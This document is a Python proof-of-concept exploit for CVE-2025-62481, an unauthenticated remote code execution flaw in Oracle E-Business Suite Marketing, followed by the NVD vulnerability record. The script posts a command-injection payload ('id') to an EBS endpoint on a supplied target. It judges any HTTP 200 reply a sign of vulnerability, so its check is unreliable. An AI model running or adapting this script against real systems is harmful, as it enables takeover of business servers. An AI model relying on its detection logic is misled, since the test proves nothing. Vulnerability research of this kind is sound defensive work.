CVE-2025-62481

# CVE-2025-62481 - Oracle E-Business Suite Oracle Marketing RCE PoC # Vulnerability: Unauthenticated Remote Code Execution via HTTP # Affected Component: Marketing Administration # Affected Versions: 12.2.3 - 12.2.14 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.example.com" MARKETING_PATH = "/OA_HTML/OA.jsp" def exploit(target_url): """ Exploit CVE-2025-62481 - Oracle Marketing Administration RCE This PoC demonstrates the unauthenticated RCE vulnerability in Oracle E-Business Suite Marketing Administration component. """ session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close" }) # Step 1: Probe target Oracle EBS instance target_endpoint = f"{target_url}{MARKETING_PATH}" print(f"[*] Probing target: {target_endpoint}") try: # Step 2: Send malicious payload to Marketing Administration component # The vulnerability exists in the Marketing Administration module # allowing unauthenticated attackers to execute arbitrary code payload_endpoint = f"{target_url}/OA_HTML/marketing/CtlMktg" # Crafted HTTP request exploiting the vulnerability response = session.post( payload_endpoint, data={ "_nf": "true", "_rc": "", "event": "execute", "command": "id" # Command injection payload }, timeout=10, verify=False ) if response.status_code == 200: print("[+] Target appears vulnerable to CVE-2025-62481") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Unexpected status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-62481 - Oracle EBS Marketing Administration RCE") print("For authorized security testing only") print("=" * 60) exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-62481", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.860", "lastModified": "2025-10-24T13:19:45.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in takeover of Oracle Marketing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "4EDDFC92-2982-411E-8A5F-AB0BD6E293E1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}